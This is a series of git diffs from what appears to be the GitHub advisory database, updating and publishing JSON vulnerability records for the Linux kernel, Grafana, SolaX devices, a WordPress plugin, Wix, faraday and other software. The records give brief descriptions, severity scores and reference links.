2a4052a723475..2d68674573fa0 100644 --- a/advisories/unreviewed/2025/07/GHSA-wpg2-262c-j98f/GHSA-wpg2-262c-j98f.json +++ b/advisories/unreviewed/2025/07/GHSA-wpg2-262c-j98f/GHSA-wpg2-262c-j98f.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-wpg2-262c-j98f", - "modified": "2026-01-08T12:30:28Z", + "modified": "2026-02-12T09:30:58Z", "published": "2025-07-04T15:31:10Z", "aliases": [ "CVE-2025-38234" @@ -27,6 +27,10 @@ "type": "WEB", "url": "https://git.kernel.org/stable/c/690e47d1403e90b7f2366f03b52ed3304194c793" }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/9f6022b2573ae068793810db719e131df3ded405" + }, { "type": "WEB", "url": "https://git.kernel.org/stable/c/debfbc047196df1f6bfd52f2d028c21dce67f0de" diff --git a/advisories/unreviewed/2025/10/GHSA-7v48-2x62-5ff3/GHSA-7v48-2x62-5ff3.json b/advisories/unreviewed/2025/10/GHSA-7v48-2x62-5ff3/GHSA-7v48-2x62-5ff3.json index 7c8e4bba11829..265a20cd148bd 100644 --- a/advisories/unreviewed/2025/10/GHSA-7v48-2x62-5ff3/GHSA-7v48-2x62-5ff3.json +++ b/advisories/unreviewed/2025/10/GHSA-7v48-2x62-5ff3/GHSA-7v48-2x62-5ff3.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-7v48-2x62-5ff3", - "modified": "2026-02-03T21:31:47Z", + "modified": "2026-02-12T09:30:58Z", "published": "2025-10-07T18:31:10Z", "aliases": [ "CVE-2023-53673" @@ -23,6 +23,10 @@ "type": "WEB", "url": "https://git.kernel.org/stable/c/093a07052406b363b1b2ab489e17dbadaf3e509b" }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/1ecf6dc2676ead4b927c50b1be0851fa4d756574" + }, { "type": "WEB", "url": "https://git.kernel.org/stable/c/59bd1e476bbc7bc6dff3c61bba787095a4839796" diff --git a/advisories/unreviewed/2025/10/GHSA-r76g-qww9-ch8r/GHSA-r76g-qww9-ch8r.json b/advisories/unreviewed/2025/10/GHSA-r76g-qww9-ch8r/GHSA-r76g-qww9-ch8r.json index 009f6894c4b9e..16635f468eb16 100644 --- a/advisories/unreviewed/2025/10/GHSA-r76g-qww9-ch8r/GHSA-r76g-qww9-ch8r.json +++ b/advisories/unreviewed/2025/10/GHSA-r76g-qww9-ch8r/GHSA-r76g-qww9-ch8r.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-r76g-qww9-ch8r", - "modified": "2025-10-28T12:30:17Z", + "modified": "2026-02-12T09:30:58Z", "published": "2025-10-28T12:30:17Z", "aliases": [ "CVE-2025-40082" @@ -14,6 +14,18 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-40082" }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/343fe375a8dd6ee51a193a1c233b999f5ea4d479" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/5b5228964619b180f366940505b77255b1a03929" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/782acde47e127c98a113726e2ff8024bd65c0454" + }, { "type": "WEB", "url": "https://git.kernel.org/stable/c/857aefc70d4ae3b9bf1ae67434d27d0f79f80c9e" @@ -21,6 +33,10 @@ { "type": "WEB", "url": "https://git.kernel.org/stable/c/bea3e1d4467bcf292c8e54f080353d556d355e26" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/c3db89ea1ed3d540eebe8f3c36e806fb75ee4a1e" } ], "database_specific": { diff --git a/advisories/unreviewed/2025/12/GHSA-2m44-r2x5-4q79/GHSA-2m44-r2x5-4q79.json b/advisories/unreviewed/2025/12/GHSA-2m44-r2x5-4q79/GHSA-2m44-r2x5-4q79.json index d8e23eabb7f4b..404749073f86e 100644 --- a/advisories/unreviewed/2025/12/GHSA-2m44-r2x5-4q79/GHSA-2m44-r2x5-4q79.json +++ b/advisories/unreviewed/2025/12/GHSA-2m44-r2x5-4q79/GHSA-2m44-r2x5-4q79.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-2m44-r2x5-4q79", - "modified": "2026-01-30T12:31:20Z", + "modified": "2026-02-12T09:30:58Z", "published": "2025-12-24T12:30:29Z", "aliases": [ "CVE-2025-68358" @@ -26,6 +26,10 @@ "type": "WEB", "url": "https://git.kernel.org/stable/c/742b90eaf394f0018352c0e10dc89763b2dd5267" }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/d4a81b8ec639895999275ea2472c69825cd67ea4" + }, { "type": "WEB", "url": "https://git.kernel.org/stable/c/db4ae18e1b31e0421fb5312e56aefa382bbc6ece" diff --git a/advisories/unreviewed/2025/12/GHSA-q35m-cwfx-j6jx/GHSA-q35m-cwfx-j6jx.json b/advisories/unreviewed/2025/12/GHSA-q35m-cwfx-j6jx/GHSA-q35m-cwfx-j6jx.json index 61355d8f1cbe2..f8b08c8ae0c94 100644 --- a/advisories/unreviewed/2025/12/GHSA-q35m-cwfx-j6jx/GHSA-q35m-cwfx-j6jx.json +++ b/advisories/unreviewed/2025/12/GHSA-q35m-cwfx-j6jx/GHSA-q35m-cwfx-j6jx.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-q35m-cwfx-j6jx", - "modified": "2025-12-16T15:30:45Z", + "modified": "2026-02-12T09:30:58Z", "published": "2025-12-16T15:30:45Z", "aliases": [ "CVE-2025-68214" @@ -33,6 +33,10 @@ { "type": "WEB", "url": "https://git.kernel.org/stable/c/a01efa7a780c42ac5170a949bd95c9786ffcc60a" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/ba43ac025c4318241f8edf94f31d2eebab86991b" } ], "database_specific": { diff --git a/advisories/unreviewed/2026/01/GHSA-72w6-32c7-vf7p/GHSA-72w6-32c7-vf7p.json b/advisories/unreviewed/2026/01/GHSA-72w6-32c7-vf7p/GHSA-72w6-32c7-vf7p.json index 1f7ce4dc15017..6d4ccf3f3fd28 100644 --- a/advisories/unreviewed/2026/01/GHSA-72w6-32c7-vf7p/GHSA-72w6-32c7-vf7p.json +++ b/advisories/unreviewed/2026/01/GHSA-72w6-32c7-vf7p/GHSA-72w6-32c7-vf7p.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-72w6-32c7-vf7p", - "modified": "2026-01-13T18:31:05Z", + "modified": "2026-02-12T09:30:58Z", "published": "2026-01-13T18:31:05Z", "aliases": [ "CVE-2025-68823" @@ -18,6 +18,14 @@ "type": "WEB", "url": "https://git.kernel.org/stable/c/0460e09a614291f06c008443f47393c37b7358e7" }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/64c0b7e2293757e8320f13434cd809f1c9257a62" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/9bcc47343ee0ef346aa7b2b460c8ff56bd882fe7" + }, { "type": "WEB", "url": "https://git.kernel.org/stable/c/c258f5c4502c9667bccf5d76fa731ab9c96687c1" diff --git a/advisories/unreviewed/2026/01/GHSA-r6cc-j9rp-4f85/GHSA-r6cc-j9rp-4f85.json b/advisories/unreviewed/2026/01/GHSA-r6cc-j9rp-4f85/GHSA-r6cc-j9rp-4f85.json index 359b4e42815c7..1f69645d5cc7b 100644 --- a/advisories/unreviewed/2026/01/GHSA-r6cc-j9rp-4f85/GHSA-r6cc-j9rp-4f85.json +++ b/advisories/unreviewed/2026/01/GHSA-r6cc-j9rp-4f85/GHSA-r6cc-j9rp-4f85.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-r6cc-j9rp-4f85", - "modified": "2026-01-13T18:31:06Z", + "modified": "2026-02-12T09:30:58Z", "published": "2026-01-13T18:31:06Z", "aliases": [ "CVE-2025-71089" @@ -22,6 +22,14 @@ "type": "WEB", "url": "https://git.kernel.org/stable/c/72f98ef9a4be30d2a60136dd6faee376f780d06c" }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/7cad37e358970af1bb49030ff01f06a69fa7d985" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/b34289505180a83607fcfdce14b5a290d0528476" + }, { "type": "WEB", "url": "https://git.kernel.org/stable/c/c2c3f1a3fd74ef16cf115f0c558616a13a8471b4" diff --git a/advisories/unreviewed/2026/02/GHSA-3f33-44xm-29m7/GHSA-3f33-44xm-29m7.json b/advisories/unreviewed/2026/02/GHSA-3f33-44xm-29m7/GHSA-3f33-44xm-29m7.json new file mode 100644 index 0000000000000..b1ae3f23e9c00 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-3f33-44xm-29m7/GHSA-3f33-44xm-29m7.json @@ -0,0 +1,34 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3f33-44xm-29m7", + "modified": "2026-02-12T09:30:58Z", + "published": "2026-02-12T09:30:58Z", + "aliases": [ + "CVE-2026-21722" + ], + "details": "Public dashboards with annotations enabled did not limit their annotation timerange to the locked timerange of the public dashboard. This means one could read the entire history of annotations visible on the specific dashboard, even those outside the locked timerange.\n\nThis did not leak any annotations that would not otherwise be visible on the public dashboard.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-21722" + }, + { + "type": "WEB", + "url": "https://grafana.com/security/security-advisories/CVE-2026-21722" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T09:16:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-cqp7-wf4c-3xgc/GHSA-cqp7-wf4c-3xgc.json b/advisories/unreviewed/2026/02/GHSA-cqp7-wf4c-3xgc/GHSA-cqp7-wf4c-3xgc.json new file mode 100644 index 0000000000000..775d3c79f3a9e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-cqp7-wf4c-3xgc/GHSA-cqp7-wf4c-3xgc.json @@ -0,0 +1,34 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cqp7-wf4c-3xgc", + "modified": "2026-02-12T09:30:59Z", + "published": "2026-02-12T09:30:59Z", + "aliases": [ + "CVE-2025-41117" + ], + "details": "Stack traces in Grafana's Explore Traces view can be rendered as raw HTML, and thus inject malicious JavaScript in the browser. This would require malicious JavaScript to be entered into the stack trace field.\n\nOnly datasources with the Jaeger HTTP API appear to be affected; Jaeger gRPC and Tempo do not appear affected whatsoever.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-41117" + }, + { + "type": "WEB", + "url": "https://grafana.com/security/security-advisories/CVE-2025-41117" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T09:16:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-g666-g65w-p8mh/GHSA-g666-g65w-p8mh.json b/advisories/unreviewed/2026/02/GHSA-g666-g65w-p8mh/GHSA-g666-g65w-p8mh.json new file mode 100644 index 0000000000000..f0d32674372c0 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-g666-g65w-p8mh/GHSA-g666-g65w-p8mh.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-g666-g65w-p8mh", + "modified": "2026-02-12T09:30:59Z", + "published": "2026-02-12T09:30:59Z", + "aliases": [ + "CVE-2025-15577" + ], + "details": "An unauthenticated attacker can exploit this vulnerability by manipulating URL to achieve arbitrary file read access.This issue affects Valmet DNA Web Tools: C2022 and older.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:N/AU:Y/R:X/V:D/RE:M/U:Green" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-15577" + }, + { + "type": "WEB", + "url": "https://www.valmet.com/company/innovation/advisories/CVE-2025-15577" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T07:15:56Z" + } +} \ No newline at end of file From 211f2afa8b40700b30845f2b054192132b11ce85 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Thu, 12 Feb 2026 12:32:19 +0000 Subject: [PATCH 030/215] Publish Advisories GHSA-4gx8-h22x-pf65 GHSA-cj74-j73p-qf3x GHSA-p5f8-584h-2hr3 GHSA-rmgp-99fm-wv32 GHSA-xp29-43pm-7r9g --- .../GHSA-4gx8-h22x-pf65.json | 31 ++++++++++++++ .../GHSA-cj74-j73p-qf3x.json | 40 +++++++++++++++++++ .../GHSA-p5f8-584h-2hr3.json | 36 +++++++++++++++++ .../GHSA-rmgp-99fm-wv32.json | 31 ++++++++++++++ .../GHSA-xp29-43pm-7r9g.json | 31 ++++++++++++++ 5 files changed, 169 insertions(+) create mode 100644 advisories/unreviewed/2026/02/GHSA-4gx8-h22x-pf65/GHSA-4gx8-h22x-pf65.json create mode 100644 advisories/unreviewed/2026/02/GHSA-cj74-j73p-qf3x/GHSA-cj74-j73p-qf3x.json create mode 100644 advisories/unreviewed/2026/02/GHSA-p5f8-584h-2hr3/GHSA-p5f8-584h-2hr3.json create mode 100644 advisories/unreviewed/2026/02/GHSA-rmgp-99fm-wv32/GHSA-rmgp-99fm-wv32.json create mode 100644 advisories/unreviewed/2026/02/GHSA-xp29-43pm-7r9g/GHSA-xp29-43pm-7r9g.json diff --git a/advisories/unreviewed/2026/02/GHSA-4gx8-h22x-pf65/GHSA-4gx8-h22x-pf65.json b/advisories/unreviewed/2026/02/GHSA-4gx8-h22x-pf65/GHSA-4gx8-h22x-pf65.json new file mode 100644 index 0000000000000..1a2ea3633e18d --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-4gx8-h22x-pf65/GHSA-4gx8-h22x-pf65.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4gx8-h22x-pf65", + "modified": "2026-02-12T12:31:00Z", + "published": "2026-02-12T12:31:00Z", + "aliases": [ + "CVE-2025-15575" + ], + "details": "The firmware update functionality does not verify the authenticity of the supplied firmware update files. This allows attackers to flash malicious firmware update files on the device. Initial analysis of the firmware update functionality does not show any cryptographic checks (e.g. digital signature checks) on the supplied firmware update files. Furthermore, ESP32 security features such as secure boot are not used.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-15575" + }, + { + "type": "WEB", + "url": "https://r.sec-consult.com/solax" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-494" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T11:15:49Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-cj74-j73p-qf3x/GHSA-cj74-j73p-qf3x.json b/advisories/unreviewed/2026/02/GHSA-cj74-j73p-qf3x/GHSA-cj74-j73p-qf3x.json new file mode 100644 index 0000000000000..3d15fd19a019c --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-cj74-j73p-qf3x/GHSA-cj74-j73p-qf3x.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cj74-j73p-qf3x", + "modified": "2026-02-12T12:31:00Z", + "published": "2026-02-12T12:31:00Z", + "aliases": [ + "CVE-2026-1356" + ], + "details": "The Converter for Media – Optimize images | Convert WebP & AVIF plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 6.5.1 via the PassthruLoader::load_image_source function. This makes it possible for unauthenticated attackers to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1356" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3445904/webp-converter-for-media" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/188d812c-2955-4b0c-ae1c-b42c0f60b73b?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-918" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T10:16:01Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-p5f8-584h-2hr3/GHSA-p5f8-584h-2hr3.json b/advisories/unreviewed/2026/02/GHSA-p5f8-584h-2hr3/GHSA-p5f8-584h-2hr3.json new file mode 100644 index 0000000000000..c01aa419e1044 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-p5f8-584h-2hr3/GHSA-p5f8-584h-2hr3.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p5f8-584h-2hr3", + "modified": "2026-02-12T12:31:00Z", + "published": "2026-02-12T12:31:00Z", + "aliases": [ + "CVE-2026-2276" + ], + "details": "Reflected Cross-Site Scripting (XSS) vulnerability in the Wix web application, where the endpoint ' https://manage.wix.com/account/account-settings ', responsible for uploading SVG images, does not properly sanitize the content. An authenticated attacker could upload an SVG file containing embedded JavaScript code, which is stored and subsequently executed when other users view the image. Exploiting this vulnerability allows arbitrary code to be executed in the context of the victim's browser, which could lead to the disclosure of sensitive information or the abuse of the affected user's session.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2276" + }, + { + "type": "WEB", + "url": "https://www.incibe.es/en/incibe-cert/notices/aviso/reflected-cross-site-scripting-wix-web-application" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T11:15:50Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rmgp-99fm-wv32/GHSA-rmgp-99fm-wv32.json b/advisories/unreviewed/2026/02/GHSA-rmgp-99fm-wv32/GHSA-rmgp-99fm-wv32.json new file mode 100644 index 0000000000000..1d0209337f45e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rmgp-99fm-wv32/GHSA-rmgp-99fm-wv32.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rmgp-99fm-wv32", + "modified": "2026-02-12T12:31:00Z", + "published": "2026-02-12T12:31:00Z", + "aliases": [ + "CVE-2025-15574" + ], + "details": "When connecting to the Solax Cloud MQTT server the username is the \"registration number\", which is the 10 character string printed on the SolaX Power Pocket device / the QR code on the device. The password is derived from the \"registration number\" using a proprietary XOR/transposition algorithm. Attackers with the knowledge of the registration numbers can connect to the MQTT server and impersonate the dongle / inverters.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-15574" + }, + { + "type": "WEB", + "url": "https://r.sec-consult.com/solax" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-330" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T11:15:49Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xp29-43pm-7r9g/GHSA-xp29-43pm-7r9g.json b/advisories/unreviewed/2026/02/GHSA-xp29-43pm-7r9g/GHSA-xp29-43pm-7r9g.json new file mode 100644 index 0000000000000..2379d6504f354 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xp29-43pm-7r9g/GHSA-xp29-43pm-7r9g.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xp29-43pm-7r9g", + "modified": "2026-02-12T12:31:00Z", + "published": "2026-02-12T12:31:00Z", + "aliases": [ + "CVE-2025-15573" + ], + "details": "The affected devices do not validate the server certificate when connecting to the SolaX Cloud MQTTS server hosted in the Alibaba Cloud (mqtt001.solaxcloud.com, TCP 8883). This allows attackers in a man-in-the-middle position to act as the legitimate MQTT server and issue arbitrary commands to devices.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-15573" + }, + { + "type": "WEB", + "url": "https://r.sec-consult.com/solax" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-295" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T11:15:47Z" + } +} \ No newline at end of file From be754209943e049a9c38bc65ca86a732f844a657 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Thu, 12 Feb 2026 14:20:58 +0000 Subject: [PATCH 031/215] Publish Advisories GHSA-2c4m-g7rx-63q7 GHSA-gf3v-fwqg-4vh7 GHSA-q672-hfc7-g833 --- .../02/GHSA-2c4m-g7rx-63q7/GHSA-2c4m-g7rx-63q7.json | 12 ++++++++++-- .../02/GHSA-gf3v-fwqg-4vh7/GHSA-gf3v-fwqg-4vh7.json | 8 ++++++-- .../02/GHSA-q672-hfc7-g833/GHSA-q672-hfc7-g833.json | 6 +++++- 3 files changed, 21 insertions(+), 5 deletions(-) diff --git a/advisories/github-reviewed/2026/02/GHSA-2c4m-g7rx-63q7/GHSA-2c4m-g7rx-63q7.json b/advisories/github-reviewed/2026/02/GHSA-2c4m-g7rx-63q7/GHSA-2c4m-g7rx-63q7.json index 0ea35ff4ebdc0..efdcc559b5cf4 100644 --- a/advisories/github-reviewed/2026/02/GHSA-2c4m-g7rx-63q7/GHSA-2c4m-g7rx-63q7.json +++ b/advisories/github-reviewed/2026/02/GHSA-2c4m-g7rx-63q7/GHSA-2c4m-g7rx-63q7.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-2c4m-g7rx-63q7", - "modified": "2026-02-11T23:12:52Z", + "modified": "2026-02-12T14:19:12Z", "published": "2026-02-11T15:13:28Z", "aliases": [ "CVE-2026-26021" @@ -40,6 +40,10 @@ "type": "WEB", "url": "https://github.com/ahdinosaur/set-in/security/advisories/GHSA-2c4m-g7rx-63q7" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26021" + }, { "type": "WEB", "url": "https://github.com/ahdinosaur/set-in/pull/6" @@ -52,6 +56,10 @@ "type": "WEB", "url": "https://github.com/ahdinosaur/set-in/commit/6bad255961d379e4b1f5fbc52ef9dc8420816f24" }, + { + "type": "WEB", + "url": "https://github.com/ahdinosaur/set-in/commit/b8e1dabfdbd35c8d604b6324e01d03f280256c3d" + }, { "type": "WEB", "url": "https://github.com/ahdinosaur/set-in/commit/d87c1a09fa2edb55cd76440a67d83d1cb828df11" @@ -68,6 +76,6 @@ "severity": "CRITICAL", "github_reviewed": true, "github_reviewed_at": "2026-02-11T15:13:28Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-11T22:15:52Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-gf3v-fwqg-4vh7/GHSA-gf3v-fwqg-4vh7.json b/advisories/github-reviewed/2026/02/GHSA-gf3v-fwqg-4vh7/GHSA-gf3v-fwqg-4vh7.json index fdeab43f52625..9f87986b14521 100644 --- a/advisories/github-reviewed/2026/02/GHSA-gf3v-fwqg-4vh7/GHSA-gf3v-fwqg-4vh7.json +++ b/advisories/github-reviewed/2026/02/GHSA-gf3v-fwqg-4vh7/GHSA-gf3v-fwqg-4vh7.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-gf3v-fwqg-4vh7", - "modified": "2026-02-11T19:30:27Z", + "modified": "2026-02-12T14:19:06Z", "published": "2026-02-11T15:13:20Z", "aliases": [ "CVE-2026-26019" @@ -43,6 +43,10 @@ "type": "WEB", "url": "https://github.com/langchain-ai/langchainjs/security/advisories/GHSA-gf3v-fwqg-4vh7" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26019" + }, { "type": "WEB", "url": "https://github.com/langchain-ai/langchainjs/pull/9990" @@ -67,6 +71,6 @@ "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2026-02-11T15:13:20Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-11T22:15:51Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-q672-hfc7-g833/GHSA-q672-hfc7-g833.json b/advisories/github-reviewed/2026/02/GHSA-q672-hfc7-g833/GHSA-q672-hfc7-g833.json index 1ac790e1a032c..8fd08026c6450 100644 --- a/advisories/github-reviewed/2026/02/GHSA-q672-hfc7-g833/GHSA-q672-hfc7-g833.json +++ b/advisories/github-reviewed/2026/02/GHSA-q672-hfc7-g833/GHSA-q672-hfc7-g833.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-q672-hfc7-g833", - "modified": "2026-02-10T14:33:40Z", + "modified": "2026-02-12T14:20:10Z", "published": "2026-02-10T12:30:28Z", "aliases": [ "CVE-2026-23906" @@ -47,6 +47,10 @@ { "type": "WEB", "url": "https://lists.apache.org/thread/2x9rv3kv6t1p577lvq4z0rl0zlt9g4sr" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2026/02/09/5" } ], "database_specific": { From 2154c9901cd2801811cd1ce193f37fd4ee4f9749 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Thu, 12 Feb 2026 14:24:38 +0000 Subject: [PATCH 032/215] Publish Advisories GHSA-33mh-2634-fwr2 GHSA-x9p2-77v6-6vhf --- .../GHSA-33mh-2634-fwr2.json | 30 +++++++++++++++++-- .../GHSA-x9p2-77v6-6vhf.json | 4 +-- 2 files changed, 30 insertions(+), 4 deletions(-) diff --git a/advisories/github-reviewed/2026/02/GHSA-33mh-2634-fwr2/GHSA-33mh-2634-fwr2.json b/advisories/github-reviewed/2026/02/GHSA-33mh-2634-fwr2/GHSA-33mh-2634-fwr2.json index 82010503afab6..a06c125cd8919 100644 --- a/advisories/github-reviewed/2026/02/GHSA-33mh-2634-fwr2/GHSA-33mh-2634-fwr2.json +++ b/advisories/github-reviewed/2026/02/GHSA-33mh-2634-fwr2/GHSA-33mh-2634-fwr2.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-33mh-2634-fwr2", - "modified": "2026-02-11T23:13:21Z", + "modified": "2026-02-12T14:22:46Z", "published": "2026-02-09T20:37:05Z", "aliases": [ "CVE-2026-25765" @@ -25,7 +25,7 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "0" + "introduced": "2.0.0" }, { "fixed": "2.14.1" @@ -36,6 +36,28 @@ "database_specific": { "last_known_affected_version_range": "<= 2.14.0" } + }, + { + "package": { + "ecosystem": "RubyGems", + "name": "faraday" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.0.0" + }, + { + "fixed": "1.10.5" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 1.10.4" + } } ], "references": [ @@ -59,6 +81,10 @@ "type": "PACKAGE", "url": "https://github.com/lostisland/faraday" }, + { + "type": "WEB", + "url": "https://github.com/lostisland/faraday/releases/tag/v1.10.5" + }, { "type": "WEB", "url": "https://github.com/lostisland/faraday/releases/tag/v2.14.1" diff --git a/advisories/github-reviewed/2026/02/GHSA-x9p2-77v6-6vhf/GHSA-x9p2-77v6-6vhf.json b/advisories/github-reviewed/2026/02/GHSA-x9p2-77v6-6vhf/GHSA-x9p2-77v6-6vhf.json index be041bf7e3bf5..c0cecc57207e0 100644 --- a/advisories/github-reviewed/2026/02/GHSA-x9p2-77v6-6vhf/GHSA-x9p2-77v6-6vhf.json +++ b/advisories/github-reviewed/2026/02/GHSA-x9p2-77v6-6vhf/GHSA-x9p2-77v6-6vhf.json @@ -1,11 +1,11 @@ { "schema_version": "1.4.0", "id": "GHSA-x9p2-77v6-6vhf", - "modified": "2026-02-05T18:02:25Z", + "modified": "2026-02-12T14:23:09Z", "published": "2026-02-05T18:02:25Z", "aliases": [], "summary": "FrankenPHP has delayed propagation of security fixes in upstream base images", - "details": "# Delayed propagation of security fixes in upstream base images\n\n## Summary\n\n**Vulnerability in base Docker images (PHP, Go, and Alpine) not automatically propagating to FrankenPHP images.**\n\nFrankenPHP's container images were previously built only when specific version tags were updated or when manual triggers were initiated. This meant that if an upstream base image (such as Alpine Linux or official PHP/Go images) received a security patch under an existing tag, the FrankenPHP image would remain on the 